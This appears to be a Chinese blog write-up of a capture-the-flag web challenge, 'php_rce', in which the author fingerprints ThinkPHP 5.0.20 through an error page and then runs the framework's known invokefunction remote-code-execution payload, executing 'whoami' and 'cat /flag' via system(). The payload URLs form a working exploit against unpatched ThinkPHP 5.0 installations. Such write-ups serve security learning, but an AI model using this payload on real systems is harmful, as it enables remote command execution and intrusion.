攻防世界-web:php_rce

题目描述

暂无

题目截图

image
熟悉的界面,ThinkPHP框架,哈哈直接找RCE Payload即可。
解题过程

1)确定ThinkPHP版本号

我们直接构造不存在的路径,即可让框架报错,在报错信息里可以看到ThinkPHP的详细版本号。
构造以下连接进行报错:

http://111.200.241.244:50901/?s=index/index1

image
可以看到详细版本号为V5.0.20

2)检查可用PayLoad

我们从0组知识库里寻找该版本的详细漏洞,检查可用PayLoad。
image
这里使用以下PayLoad:

http://111.200.241.244:50901/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

image
命令成功执行

3)构造PayLoad,获取Flag

http://111.200.241.244:50901/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

image

提交得分

posted @ 2021-10-13 10:44  顺时针--+  阅读(53)  评论(0)    收藏  举报